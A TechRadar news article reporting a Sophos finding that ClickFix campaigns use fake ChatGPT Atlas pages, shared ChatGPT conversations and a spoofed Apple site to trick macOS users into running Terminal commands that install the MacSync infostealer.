- Sophos warns of more macOS ClickFix campaigns
- Fake AI tools, ChatGPT conversations and Apple website used to spread MacSync infostealer
- Latest variant uses loaders, AppleScript and in-memory execution for stealth
Security researchers have warned of an increase in ongoing malware campaigns targeting macOS users, leveraging malicious ads, legitimate hosting services, brand impersonation, fake ChatGPT conversations and a little old-fashioned social engineering to infect victims.
A new report from Sophos claims at least three different ClickFix campaigns have been running over the past three months. ClickFix is a known method where crooks will present users with a fake problem and at the same time offer a solution – which can be anything from a fake CAPTCHA to a “locked” document.
Whatever it is, “fixing” the problem requires running a Terminal command which downloads and installs MacSync infostealer.
The article continues below
MacOS a frequent target
In the first campaign, the “problem” was installing an AI browser. Users searching for a specific keyword would see an ad at the top of Google search results, which would lead to a fake browser download page hosted on sites.google.com.
The site looks authentic and spoofs OpenAI’s ChatGPT Atlas – but to download, users are asked to bring up the terminal and insert a specific command.
The second campaign is somewhat different because instead of relying on a website, the crooks would set up a ChatGPT conversation.
Each conversation with the tool has a unique identifier and can be shared with other people using the “share” feature. Now, crooks would create a conversation instructing how to download “Mac system cleaner apps” and similar tools, which would in turn trick victims into downloading the infostealer. Then they would advertise that conversation on Google to improve perceived legitimacy.
The third campaign described in the Sophos report impersonates the legitimate Apple website and delivers a significantly evolved variant of the MacSync infostealer. Unlike the previous campaigns, this one uses a multi-stage loader-as-a-service model, dynamic AppleScript payloads, and in-memory execution to maximize stealth and persistence.
“The prevailing wisdom used to be that macOS had a lower risk of malware infection compared to Windows, due to a built-in suite of security features that forced threat actors to employ different, sometimes technically challenging, techniques,” the researchers explained.
“That’s no longer the case (and hasn’t been for some time, as we noted in September 2024). Mainstream malware now regularly affects macOS users – especially when it comes to infostealers, which regularly account for a significant portion of all the macOS detections we see in telemetry. We expect this region of the threat landscape to continue to evolve, but as always, we will evolve with it, and it will evolve quickly. continue to monitor for new variants, update protection and detection information as needed, and publish research on this aspect of the threat landscape as data becomes available.”
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
